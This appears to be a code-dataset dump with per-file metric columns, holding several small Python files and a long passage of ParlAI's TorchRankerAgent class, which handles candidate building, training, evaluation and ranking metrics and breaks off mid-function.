| 28.5625 | 75 | 0.509847 | 49 | 457 | 4.44898 | 0.326531 | 0.715596 | 0.238532 | 0.385321 | 0.733945 | 0.733945 | 0.715596 | 0.715596 | 0.481651 | 0.481651 | 0 | 0 | 0.321663 | 457 | 15 | 76 | 30.466667 | 0.703226 | 0 | 0 | 0 | 0 | 0 | 0.035011 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0.076923 | 0.230769 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1626c2a5eb6b28dabfea5931e5a5c031cf28009d | 38 | py | Python | Bot/1_Find/Logic/_List_Of_Stocks.py | ReedGraff/High-Low | c8ba0339d7818e344cacf9a73a83d24dc539c2ca | [
"MIT"
] | 1 | 2022-01-06T05:50:53.000Z | 2022-01-06T05:50:53.000Z | Bot/1_Find/Logic/_List_Of_Stocks.py | ReedGraff/High-Low | c8ba0339d7818e344cacf9a73a83d24dc539c2ca | [
"MIT"
] | null | null | null | Bot/1_Find/Logic/_List_Of_Stocks.py | ReedGraff/High-Low | c8ba0339d7818e344cacf9a73a83d24dc539c2ca | [
"MIT"
] | null | null | null | def List_Of_Stocks(self):
return 0 | 19 | 25 | 0.736842 | 7 | 38 | 3.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0.184211 | 38 | 2 | 26 | 19 | 0.806452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
16724876d55904e397e0997a494911b83e46b50f | 140 | py | Python | django/core/views.py | shamsow/django-react-homemaker | 8bfc6de6a7bcb838069904af8bf8f2e1f8671297 | [
"MIT",
"Unlicense"
] | null | null | null | django/core/views.py | shamsow/django-react-homemaker | 8bfc6de6a7bcb838069904af8bf8f2e1f8671297 | [
"MIT",
"Unlicense"
] | 14 | 2021-09-07T13:56:02.000Z | 2022-01-19T13:13:54.000Z | django/core/views.py | shamsow/django-react-homemaker | 8bfc6de6a7bcb838069904af8bf8f2e1f8671297 | [
"MIT",
"Unlicense"
] | null | null | null | from django.shortcuts import reverse, HttpResponseRedirect
def default_view(request):
return HttpResponseRedirect(reverse('admin:index'))
| 28 | 58 | 0.835714 | 15 | 140 | 7.733333 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078571 | 140 | 4 | 59 | 35 | 0.899225 | 0 | 0 | 0 | 0 | 0 | 0.078571 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
167fa52465666ca636edd2498305844058711ec8 | 112 | py | Python | stachrl/utils/clearscreen.py | christophstach/reinforcement-learning-klutzy-back-phoebe | 7fdf557f51ea29038a193fbfc6b63261e5fe4685 | [
"MIT"
] | null | null | null | stachrl/utils/clearscreen.py | christophstach/reinforcement-learning-klutzy-back-phoebe | 7fdf557f51ea29038a193fbfc6b63261e5fe4685 | [
"MIT"
] | null | null | null | stachrl/utils/clearscreen.py | christophstach/reinforcement-learning-klutzy-back-phoebe | 7fdf557f51ea29038a193fbfc6b63261e5fe4685 | [
"MIT"
] | null | null | null | import os
def clearscreen():
    # Shell-based alternative (this is what the `os` import above is for):
    # os.system('cls' if os.name == 'nt' else 'clear')
    # ANSI escape codes: \033[H moves the cursor home, \033[J clears the screen.
    print('\033[H\033[J')
| 16 | 54 | 0.580357 | 18 | 112 | 3.611111 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067416 | 0.205357 | 112 | 6 | 55 | 18.666667 | 0.662921 | 0.428571 | 0 | 0 | 0 | 0 | 0.193548 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
168632ad4b620ff40d22b804c3f5abc6dc67669a | 41 | py | Python | semantic/semantic/logging/__init__.py | VladimirSiv/semantic-search-system | 96b6581f191aacb1157b1408b2726e317ddc2c49 | [
"MIT"
] | 1 | 2021-07-01T08:53:46.000Z | 2021-07-01T08:53:46.000Z | front/front/logging/__init__.py | VladimirSiv/semantic-search-system | 96b6581f191aacb1157b1408b2726e317ddc2c49 | [
"MIT"
] | null | null | null | front/front/logging/__init__.py | VladimirSiv/semantic-search-system | 96b6581f191aacb1157b1408b2726e317ddc2c49 | [
"MIT"
] | 1 | 2021-12-29T01:18:38.000Z | 2021-12-29T01:18:38.000Z | from .logger import logger, logger_setup
| 20.5 | 40 | 0.829268 | 6 | 41 | 5.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121951 | 41 | 1 | 41 | 41 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
169f0889ffbfe00c62e34f90a9999cbcc186d301 | 27 | py | Python | mail_fix_553/__init__.py | aaltinisik/mail-addons | d829c1d9e4320013ab557c34d6d79b956ebd7349 | [
"MIT"
] | 1 | 2020-12-07T19:52:33.000Z | 2020-12-07T19:52:33.000Z | mail_fix_553/__init__.py | trojikman/mail-addons | 193caa9af759700a588cdec8910ccbad05b59104 | [
"MIT"
] | 1 | 2019-03-15T14:45:46.000Z | 2019-03-15T14:45:46.000Z | mail_fix_553/__init__.py | trojikman/mail-addons | 193caa9af759700a588cdec8910ccbad05b59104 | [
"MIT"
] | 1 | 2021-08-28T11:18:33.000Z | 2021-08-28T11:18:33.000Z | from . import mail_fix_553
| 13.5 | 26 | 0.814815 | 5 | 27 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 0.148148 | 27 | 1 | 27 | 27 | 0.73913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bcc17afeb54e1fbacd7538e1b12f01ca71028e6a | 83,822 | py | Python | parlai/core/torch_ranker_agent.py | SeolhwaLee/Parlai_ver2 | 6f43d1929cab26e07a2f384bc5f731714ddb54d7 | [
"MIT"
] | 1 | 2020-08-25T03:46:02.000Z | 2020-08-25T03:46:02.000Z | parlai/core/torch_ranker_agent.py | sseol11/Parlai_ver2 | 6f43d1929cab26e07a2f384bc5f731714ddb54d7 | [
"MIT"
] | null | null | null | parlai/core/torch_ranker_agent.py | sseol11/Parlai_ver2 | 6f43d1929cab26e07a2f384bc5f731714ddb54d7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Torch Ranker Agents provide functionality for building ranking models.
See the TorchRankerAgent tutorial for examples.
"""
from typing import Dict, Any
from abc import abstractmethod
from itertools import islice
import os
from tqdm import tqdm
import random
import torch
from parlai.core.opt import Opt
from parlai.utils.distributed import is_distributed
from parlai.core.torch_agent import TorchAgent, Output
from parlai.utils.misc import warn_once
from parlai.utils.torch import (
padded_3d,
total_parameters,
trainable_parameters,
PipelineHelper,
)
from parlai.utils.fp16 import FP16SafeCrossEntropy
from parlai.core.metrics import AverageMetric
class TorchRankerAgent(TorchAgent):
"""
Abstract TorchRankerAgent class; only meant to be extended.
TorchRankerAgents aim to provide convenient functionality for building ranking
models. This includes:
- Training/evaluating on candidates from a variety of sources.
- Computing hits@1, hits@5, mean reciprocal rank (MRR), and other metrics.
- Caching representations for fast runtime when deploying models to production.
"""
@classmethod
def add_cmdline_args(cls, argparser):
"""
Add CLI args.
"""
super(TorchRankerAgent, cls).add_cmdline_args(argparser)
agent = argparser.add_argument_group('TorchRankerAgent')
agent.add_argument(
'-cands',
'--candidates',
type=str,
default='inline',
choices=['batch', 'inline', 'fixed', 'batch-all-cands'],
help='The source of candidates during training '
'(see TorchRankerAgent._build_candidates() for details).',
)
agent.add_argument(
'-ecands',
'--eval-candidates',
type=str,
default='inline',
choices=['batch', 'inline', 'fixed', 'vocab', 'batch-all-cands'],
help='The source of candidates during evaluation (defaults to the same '
'value as --candidates if no flag is given)',
)
agent.add_argument(
'--repeat-blocking-heuristic',
type='bool',
default=True,
help='Block repeating previous utterances. '
'Helpful for many models that score repeats highly, so switched '
'on by default.',
)
agent.add_argument(
'-fcp',
'--fixed-candidates-path',
type=str,
help='A text file of fixed candidates to use for all examples, one '
'candidate per line',
)
agent.add_argument(
'--fixed-candidate-vecs',
type=str,
default='reuse',
help='One of "reuse", "replace", or a path to a file with vectors '
'corresponding to the candidates at --fixed-candidates-path. '
'The default path is /path/to/model-file.<cands_name>, where '
'<cands_name> is the name of the file (not the full path) passed by '
'the flag --fixed-candidates-path. By default, this file is created '
'once and reused. To replace it, use the "replace" option.',
)
agent.add_argument(
'--encode-candidate-vecs',
type='bool',
default=True,
help='Cache and save the encoding of the candidate vecs. This '
'might be used when interacting with the model in real time '
'or evaluating on a fixed candidate set when the encoding of '
'the candidates is independent of the input.',
)
agent.add_argument(
'--encode-candidate-vecs-batchsize',
type=int,
default=256,
hidden=True,
help='Batchsize when encoding candidate vecs',
)
agent.add_argument(
'--init-model',
type=str,
default=None,
help='Initialize model with weights from this file.',
)
agent.add_argument(
'--train-predict',
type='bool',
default=False,
help='Get predictions and calculate mean rank during the train '
'step. Turning this on may slow down training.',
)
agent.add_argument(
'--cap-num-predictions',
type=int,
default=100,
help='Limit to the number of predictions in output.text_candidates',
)
agent.add_argument(
'--ignore-bad-candidates',
type='bool',
default=False,
help='Ignore examples for which the label is not present in the '
'label candidates. Default behavior results in a RuntimeError. ',
)
agent.add_argument(
'--rank-top-k',
type=int,
default=-1,
help='Ranking returns the top k results if k > 0, otherwise sorts every '
'single candidate according to the ranking.',
)
agent.add_argument(
'--inference',
choices={'max', 'topk'},
default='max',
help='Final response output algorithm',
)
agent.add_argument(
'--topk',
type=int,
default=5,
help='K used in Top K sampling inference, when selected',
)
agent.add_argument(
'--return-cand-scores',
type='bool',
default=False,
help='Return sorted candidate scores from eval_step',
)
def __init__(self, opt: Opt, shared=None):
# Must call _get_init_model() first so that paths are updated if necessary
# (e.g., a .dict file)
init_model, is_finetune = self._get_init_model(opt, shared)
opt['rank_candidates'] = True
super().__init__(opt, shared)
states: Dict[str, Any]
if shared:
states = {}
else:
# Note: we cannot change the type of metrics ahead of time, so you
# should correctly initialize to floats or ints here
self.criterion = self.build_criterion()
self.model = self.build_model()
if self.model is None or self.criterion is None:
raise AttributeError(
'build_model() and build_criterion() need to return the model '
'or criterion'
)
train_params = trainable_parameters(self.model)
total_params = total_parameters(self.model)
print(f"Total parameters: {total_params:,d} ({train_params:,d} trainable)")
if self.fp16:
self.model = self.model.half()
if init_model:
print('Loading existing model parameters from ' + init_model)
states = self.load(init_model)
else:
states = {}
if self.use_cuda:
if self.model_parallel:
self.model = PipelineHelper().make_parallel(self.model)
else:
self.model.cuda()
if self.data_parallel:
self.model = torch.nn.DataParallel(self.model)
self.criterion.cuda()
self.rank_top_k = opt.get('rank_top_k', -1)
# Vectorize and save fixed/vocab candidates once upfront if applicable
self.set_fixed_candidates(shared)
self.set_vocab_candidates(shared)
if shared:
# We don't use get here because hasattr is used on optimizer later.
if 'optimizer' in shared:
self.optimizer = shared['optimizer']
elif self._should_initialize_optimizer():
# only build an optimizer if we're training
optim_params = [p for p in self.model.parameters() if p.requires_grad]
self.init_optim(
optim_params, states.get('optimizer'), states.get('optimizer_type')
)
self.build_lr_scheduler(states, hard_reset=is_finetune)
if shared is None and is_distributed():
device_ids = None if self.model_parallel else [self.opt['gpu']]
self.model = torch.nn.parallel.DistributedDataParallel(
self.model, device_ids=device_ids, broadcast_buffers=False
)
def build_criterion(self):
"""
Construct and return the loss function.
By default torch.nn.CrossEntropyLoss.
"""
if self.fp16:
return FP16SafeCrossEntropy(reduction='none')
else:
return torch.nn.CrossEntropyLoss(reduction='none')
def set_interactive_mode(self, mode, shared=False):
super().set_interactive_mode(mode, shared)
self.candidates = self.opt['candidates']
self.encode_candidate_vecs = self.opt['encode_candidate_vecs']
if mode:
self.eval_candidates = 'fixed'
self.ignore_bad_candidates = True
self.fixed_candidates_path = self.opt['fixed_candidates_path']
if self.fixed_candidates_path is None or self.fixed_candidates_path == '':
# Attempt to get a standard candidate set for the given task
path = self.get_task_candidates_path()
if path:
if not shared:
print("[setting fixed_candidates path to: " + path + " ]")
self.fixed_candidates_path = path
else:
self.eval_candidates = self.opt['eval_candidates']
self.ignore_bad_candidates = self.opt.get('ignore_bad_candidates', False)
self.fixed_candidates_path = self.opt['fixed_candidates_path']
def get_task_candidates_path(self):
path = self.opt['model_file'] + '.cands-' + self.opt['task'] + '.cands'
if os.path.isfile(path) and self.opt['fixed_candidate_vecs'] == 'reuse':
return path
print("[ *** building candidates file as they do not exist: " + path + ' *** ]')
from parlai.scripts.build_candidates import build_cands
from copy import deepcopy
opt = deepcopy(self.opt)
opt['outfile'] = path
opt['datatype'] = 'train:evalmode'
opt['interactive_task'] = False
opt['batchsize'] = 1
build_cands(opt)
return path
@abstractmethod
def score_candidates(self, batch, cand_vecs, cand_encs=None):
"""
Given a batch and candidate set, return scores (for ranking).
:param Batch batch:
a Batch object (defined in torch_agent.py)
:param LongTensor cand_vecs:
padded and tokenized candidates
:param FloatTensor cand_encs:
encoded candidates, if these are passed into the function (in cases
where we cache the candidate encodings), you do not need to call
self.model on cand_vecs
"""
pass
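# A minimal sketch of one possible child-class implementation (hypothetical:
# it assumes the model exposes encode_context() and encode_cands() helpers,
# which this base class does not define, and that cand_vecs is the shared
# 2-D [num_cands, seqlen] case). Scores are dot products between context and
# candidate representations:
#
#   def score_candidates(self, batch, cand_vecs, cand_encs=None):
#       context_h = self.model.encode_context(batch.text_vec)  # [bsz, dim]
#       if cand_encs is None:
#           cand_encs = self.model.encode_cands(cand_vecs)     # [num_cands, dim]
#       return context_h.mm(cand_encs.t())                     # [bsz, num_cands]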
def _maybe_invalidate_fixed_encs_cache(self):
if self.candidates != 'fixed':
self.fixed_candidate_encs = None
def _get_batch_train_metrics(self, scores):
"""
Get fast metrics calculations if we train with batch candidates.
Specifically, calculate accuracy ('train_accuracy'), average rank, and mean
reciprocal rank.
"""
batchsize = scores.size(0)
# get accuracy
targets = scores.new_empty(batchsize).long()
targets = torch.arange(batchsize, out=targets)
nb_ok = (scores.max(dim=1)[1] == targets).float()
self.record_local_metric('train_accuracy', AverageMetric.many(nb_ok))
# calculate mean_rank
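# scores.diag() is each example's score for its own label (with batch
# candidates, example i's label sits at column i), so counting the entries
# that score strictly higher yields the label's 1-based rank.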
above_dot_prods = scores - scores.diag().view(-1, 1)
ranks = (above_dot_prods > 0).float().sum(dim=1) + 1
mrr = 1.0 / (ranks + 0.00001)
self.record_local_metric('rank', AverageMetric.many(ranks))
self.record_local_metric('mrr', AverageMetric.many(mrr))
def _get_train_preds(self, scores, label_inds, cands, cand_vecs):
"""
Return predictions from training.
"""
# TODO: speed these calculations up
batchsize = scores.size(0)
if self.rank_top_k > 0:
_, ranks = scores.topk(
min(self.rank_top_k, scores.size(1)), 1, largest=True
)
else:
_, ranks = scores.sort(1, descending=True)
ranks_m = []
mrrs_m = []
for b in range(batchsize):
rank = (ranks[b] == label_inds[b]).nonzero()
rank = rank.item() if len(rank) == 1 else scores.size(1)
ranks_m.append(1 + rank)
mrrs_m.append(1.0 / (1 + rank))
self.record_local_metric('rank', AverageMetric.many(ranks_m))
self.record_local_metric('mrr', AverageMetric.many(mrrs_m))
ranks = ranks.cpu()
# Here we get the top prediction for each example, but do not
# return the full ranked list for the sake of training speed
preds = []
for i, ordering in enumerate(ranks):
if cand_vecs.dim() == 2: # num cands x max cand length
cand_list = cands
elif cand_vecs.dim() == 3: # batchsize x num cands x max cand length
cand_list = cands[i]
if len(ordering) != len(cand_list):
# We may have added padded cands to fill out the batch;
# Here we break after finding the first non-pad cand in the
# ranked list
for x in ordering:
if x < len(cand_list):
preds.append(cand_list[x])
break
else:
preds.append(cand_list[ordering[0]])
return Output(preds)
def is_valid(self, obs):
"""
Override from TorchAgent.
Check to see if label candidates contain the label.
"""
if not self.ignore_bad_candidates:
return super().is_valid(obs)
if not super().is_valid(obs):
return False
# skip examples for which the set of label candidates do not
# contain the label
if 'labels_vec' in obs and 'label_candidates_vecs' in obs:
cand_vecs = obs['label_candidates_vecs']
label_vec = obs['labels_vec']
matches = [x for x in cand_vecs if torch.equal(x, label_vec)]
if len(matches) == 0:
warn_once(
'At least one example has a set of label candidates that '
'does not contain the label.'
)
return False
return True
def train_step(self, batch):
"""
Train on a single batch of examples.
"""
self._maybe_invalidate_fixed_encs_cache()
if batch.text_vec is None and batch.image is None:
return
self.model.train()
self.zero_grad()
cands, cand_vecs, label_inds = self._build_candidates(
batch, source=self.candidates, mode='train'
)
try:
scores = self.score_candidates(batch, cand_vecs)
loss = self.criterion(scores, label_inds)
self.record_local_metric('mean_loss', AverageMetric.many(loss))
loss = loss.mean()
self.backward(loss)
self.update_params()
except RuntimeError as e:
# catch out of memory exceptions during fwd/bck (skip batch)
if 'out of memory' in str(e):
print(
'| WARNING: ran out of memory, skipping batch. '
'if this happens frequently, decrease batchsize or '
'truncate the inputs to the model.'
)
return Output()
else:
raise e
# Get train predictions
if self.candidates == 'batch':
self._get_batch_train_metrics(scores)
return Output()
if not self.opt.get('train_predict', False):
warn_once(
"Some training metrics are omitted for speed. Set the flag "
"`--train-predict` to calculate train metrics."
)
return Output()
return self._get_train_preds(scores, label_inds, cands, cand_vecs)
def eval_step(self, batch):
"""
Evaluate a single batch of examples.
"""
if batch.text_vec is None and batch.image is None:
return
batchsize = (
batch.text_vec.size(0)
if batch.text_vec is not None
else batch.image.size(0)
)
self.model.eval()
cands, cand_vecs, label_inds = self._build_candidates(
batch, source=self.eval_candidates, mode='eval'
)
cand_encs = None
if self.encode_candidate_vecs and self.eval_candidates in ['fixed', 'vocab']:
# if we cached candidate encodings for a fixed list of candidates,
# pass those into the score_candidates function
if self.fixed_candidate_encs is None:
self.fixed_candidate_encs = self._make_candidate_encs(
cand_vecs
).detach()
if self.eval_candidates == 'fixed':
cand_encs = self.fixed_candidate_encs
elif self.eval_candidates == 'vocab':
cand_encs = self.vocab_candidate_encs
scores = self.score_candidates(batch, cand_vecs, cand_encs=cand_encs)
if self.rank_top_k > 0:
sorted_scores, ranks = scores.topk(
min(self.rank_top_k, scores.size(1)), 1, largest=True
)
else:
sorted_scores, ranks = scores.sort(1, descending=True)
if self.opt.get('return_cand_scores', False):
sorted_scores = sorted_scores.cpu()
else:
sorted_scores = None
# Update metrics
if label_inds is not None:
loss = self.criterion(scores, label_inds)
self.record_local_metric('loss', AverageMetric.many(loss))
ranks_m = []
mrrs_m = []
for b in range(batchsize):
rank = (ranks[b] == label_inds[b]).nonzero()
rank = rank.item() if len(rank) == 1 else scores.size(1)
ranks_m.append(1 + rank)
mrrs_m.append(1.0 / (1 + rank))
self.record_local_metric('rank', AverageMetric.many(ranks_m))
self.record_local_metric('mrr', AverageMetric.many(mrrs_m))
ranks = ranks.cpu()
max_preds = self.opt['cap_num_predictions']
cand_preds = []
for i, ordering in enumerate(ranks):
if cand_vecs.dim() == 2:
cand_list = cands
elif cand_vecs.dim() == 3:
cand_list = cands[i]
# using a generator instead of a list comprehension allows
# us to cap the number of elements.
cand_preds_generator = (
cand_list[rank] for rank in ordering if rank < len(cand_list)
)
cand_preds.append(list(islice(cand_preds_generator, max_preds)))
if (
self.opt.get('repeat_blocking_heuristic', True)
and self.eval_candidates == 'fixed'
):
cand_preds = self.block_repeats(cand_preds)
if self.opt.get('inference', 'max') == 'max':
preds = [cand_preds[i][0] for i in range(batchsize)]
else:
# Top-k inference.
preds = []
for i in range(batchsize):
preds.append(random.choice(cand_preds[i][0 : self.opt['topk']]))
return Output(preds, cand_preds, sorted_scores=sorted_scores)
def block_repeats(self, cand_preds):
"""
Heuristic to block a model repeating a line from the history.
"""
history_strings = []
for h in self.history.history_raw_strings:
# Heuristic: Block any given line in the history, splitting by '\n'.
history_strings.extend(h.split('\n'))
new_preds = []
for cp in cand_preds:
np = []
for c in cp:
if c not in history_strings:
np.append(c)
new_preds.append(np)
return new_preds
def _set_label_cands_vec(self, *args, **kwargs):
"""
Set the 'label_candidates_vec' field in the observation.
Useful to override to change vectorization behavior.
"""
obs = args[0]
if 'labels' in obs:
cands_key = 'candidates'
else:
cands_key = 'eval_candidates'
if self.opt[cands_key] not in ['inline', 'batch-all-cands']:
# vectorize label candidates if and only if we are using inline
# candidates
return obs
return super()._set_label_cands_vec(*args, **kwargs)
def _build_candidates(self, batch, source, mode):
"""
Build a candidate set for this batch.
:param batch:
a Batch object (defined in torch_agent.py)
:param source:
the source from which candidates should be built, one of
['batch', 'batch-all-cands', 'inline', 'fixed']
:param mode:
'train' or 'eval'
:return: tuple of tensors (cands, cand_vecs, label_inds), in the order
returned at the end of this method
cands: A [num_cands] list of (text) candidates
OR a [batchsize] list of such lists if source=='inline'
cand_vecs: A padded [num_cands, seqlen] LongTensor of vectorized candidates
OR a [batchsize, num_cands, seqlen] LongTensor if source=='inline'
label_inds: A [bsz] LongTensor of the indices of the labels for each
example from its respective candidate set
Possible sources of candidates:
* batch: the set of all labels in this batch
Use all labels in the batch as the candidate set (with all but the
example's label being treated as negatives).
Note: with this setting, the candidate set is identical for all
examples in a batch. This option may be undesirable if it is possible
for duplicate labels to occur in a batch, since the second instance of
the correct label will be treated as a negative.
* batch-all-cands: the set of all candidates in this batch
Use all candidates in the batch as candidate set.
Note 1: This can result in a very large number of candidates.
Note 2: In this case we will deduplicate candidates.
Note 3: just like with 'batch' the candidate set is identical
for all examples in a batch.
* inline: batch_size lists, one list per example
If each example comes with a list of possible candidates, use those.
Note: With this setting, each example will have its own candidate set.
* fixed: one global candidate list, provided in a file from the user
If self.fixed_candidates is not None, use a set of fixed candidates for
all examples.
Note: this setting is not recommended for training unless the
universe of possible candidates is very small.
* vocab: one global candidate list, extracted from the vocabulary with the
exception of self.NULL_IDX.
"""
label_vecs = batch.label_vec # [bsz] list of lists of LongTensors
label_inds = None
batchsize = (
batch.text_vec.size(0)
if batch.text_vec is not None
else batch.image.size(0)
)
if label_vecs is not None:
assert label_vecs.dim() == 2
if source == 'batch':
warn_once(
'[ Executing {} mode with batch labels as set of candidates. ]'
''.format(mode)
)
if batchsize == 1:
warn_once(
"[ Warning: using candidate source 'batch' and observed a "
"batch of size 1. This may be due to uneven batch sizes at "
"the end of an epoch. ]"
)
if label_vecs is None:
raise ValueError(
"If using candidate source 'batch', then batch.label_vec cannot be "
"None."
)
cands = batch.labels
cand_vecs = label_vecs
label_inds = label_vecs.new_tensor(range(batchsize))
elif source == 'batch-all-cands':
warn_once(
'[ Executing {} mode with all candidates provided in the batch ]'
''.format(mode)
)
if batch.candidate_vecs is None:
raise ValueError(
"If using candidate source 'batch-all-cands', then batch."
"candidate_vecs cannot be None. If your task does not have "
"inline candidates, consider using one of "
"--{m}={{'batch','fixed','vocab'}}."
"".format(m='candidates' if mode == 'train' else 'eval-candidates')
)
# build a deduplicated list of every candidate appearing in the batch
cands = []
all_cands_vecs = []
# dictionary used for deduplication
cands_to_id = {}
for i, cands_for_sample in enumerate(batch.candidates):
for j, cand in enumerate(cands_for_sample):
if cand not in cands_to_id:
cands.append(cand)
cands_to_id[cand] = len(cands_to_id)
all_cands_vecs.append(batch.candidate_vecs[i][j])
cand_vecs, _ = self._pad_tensor(all_cands_vecs)
label_inds = label_vecs.new_tensor(
[cands_to_id[label] for label in batch.labels]
)
elif source == 'inline':
warn_once(
'[ Executing {} mode with provided inline set of candidates ]'
''.format(mode)
)
if batch.candidate_vecs is None:
raise ValueError(
"If using candidate source 'inline', then batch.candidate_vecs "
"cannot be None. If your task does not have inline candidates, "
"consider using one of --{m}={{'batch','fixed','vocab'}}."
"".format(m='candidates' if mode == 'train' else 'eval-candidates')
)
cands = batch.candidates
cand_vecs = padded_3d(
batch.candidate_vecs,
self.NULL_IDX,
use_cuda=self.use_cuda,
fp16friendly=self.fp16,
)
if label_vecs is not None:
label_inds = label_vecs.new_empty((batchsize))
bad_batch = False
for i, label_vec in enumerate(label_vecs):
label_vec_pad = label_vec.new_zeros(cand_vecs[i].size(1)).fill_(
self.NULL_IDX
)
if cand_vecs[i].size(1) < len(label_vec):
label_vec = label_vec[0 : cand_vecs[i].size(1)]
label_vec_pad[0 : label_vec.size(0)] = label_vec
label_inds[i] = self._find_match(cand_vecs[i], label_vec_pad)
if label_inds[i] == -1:
bad_batch = True
if bad_batch:
if self.ignore_bad_candidates and not self.is_training:
label_inds = None
else:
raise RuntimeError(
'At least one of your examples has a set of label candidates '
'that does not contain the label. To ignore this error '
'set `--ignore-bad-candidates True`.'
)
elif source == 'fixed':
if self.fixed_candidates is None:
raise ValueError(
"If using candidate source 'fixed', then you must provide the path "
"to a file of candidates with the flag --fixed-candidates-path or "
"the name of a task with --fixed-candidates-task."
)
warn_once(
"[ Executing {} mode with a common set of fixed candidates "
"(n = {}). ]".format(mode, len(self.fixed_candidates))
)
cands = self.fixed_candidates
cand_vecs = self.fixed_candidate_vecs
if label_vecs is not None:
label_inds = label_vecs.new_empty((batchsize))
bad_batch = False
for batch_idx, label_vec in enumerate(label_vecs):
max_c_len = cand_vecs.size(1)
label_vec_pad = label_vec.new_zeros(max_c_len).fill_(self.NULL_IDX)
if max_c_len < len(label_vec):
label_vec = label_vec[0:max_c_len]
label_vec_pad[0 : label_vec.size(0)] = label_vec
label_inds[batch_idx] = self._find_match(cand_vecs, label_vec_pad)
if label_inds[batch_idx] == -1:
bad_batch = True
if bad_batch:
if self.ignore_bad_candidates and not self.is_training:
label_inds = None
else:
raise RuntimeError(
'At least one of your examples has a set of label candidates '
'that does not contain the label. To ignore this error '
'set `--ignore-bad-candidates True`.'
)
elif source == 'vocab':
warn_once(
'[ Executing {} mode with tokens from vocabulary as candidates. ]'
''.format(mode)
)
cands = self.vocab_candidates
cand_vecs = self.vocab_candidate_vecs
# NOTE: label_inds is None here, as we will not find the label in
# the set of vocab candidates
else:
raise Exception("Unrecognized source: %s" % source)
return (cands, cand_vecs, label_inds)
@staticmethod
def _find_match(cand_vecs, label_vec):
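# Return the index of the first row of cand_vecs that matches label_vec
# element-wise, or -1 if the label is absent from the candidate set.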
matches = ((cand_vecs == label_vec).sum(1) == cand_vecs.size(1)).nonzero()
if len(matches) > 0:
return matches[0]
return -1
def share(self):
"""
Share model parameters.
"""
shared = super().share()
shared['fixed_candidates'] = self.fixed_candidates
shared['fixed_candidate_vecs'] = self.fixed_candidate_vecs
shared['fixed_candidate_encs'] = self.fixed_candidate_encs
shared['num_fixed_candidates'] = self.num_fixed_candidates
shared['vocab_candidates'] = self.vocab_candidates
shared['vocab_candidate_vecs'] = self.vocab_candidate_vecs
shared['vocab_candidate_encs'] = self.vocab_candidate_encs
if hasattr(self, 'optimizer'):
shared['optimizer'] = self.optimizer
return shared
def set_vocab_candidates(self, shared):
"""
Load the tokens from the vocab as candidates.
self.vocab_candidates will contain a [num_cands] list of strings
self.vocab_candidate_vecs will contain a [num_cands, 1] LongTensor
"""
if shared:
self.vocab_candidates = shared['vocab_candidates']
self.vocab_candidate_vecs = shared['vocab_candidate_vecs']
self.vocab_candidate_encs = shared['vocab_candidate_encs']
else:
if 'vocab' in (self.opt['candidates'], self.opt['eval_candidates']):
cands = []
vecs = []
for ind in range(1, len(self.dict)):
cands.append(self.dict.ind2tok[ind])
vecs.append(ind)
self.vocab_candidates = cands
self.vocab_candidate_vecs = torch.LongTensor(vecs).unsqueeze(1)
print(
"[ Loaded fixed candidate set (n = {}) from vocabulary ]"
